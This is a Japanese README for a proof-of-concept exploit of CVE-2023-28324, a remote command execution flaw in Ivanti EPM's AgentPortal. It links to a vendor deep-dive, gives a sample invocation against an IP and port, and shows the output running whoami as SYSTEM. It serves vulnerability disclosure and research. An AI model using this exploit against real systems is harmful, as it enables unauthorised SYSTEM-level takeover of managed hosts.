
Ivanti EPM AgentPortal RCE脆弱性
Ivanti EPM に影響する CVE-2023-28324 の PoC
脆弱性の根本原因の技術的分析は弊社ブログでご覧いただけます: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
この PoC は AgentPortal.exe の脆弱性を悪用して任意のコマンドを実行します。この PoC を動作させるには、Ivanti EPM インストールから AgentPortal.exe と APCommon.dll への独自の参照を提供する必要があります。
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
このソフトウェアは、学術研究および効果的な防御技術の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトメンテナは、ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。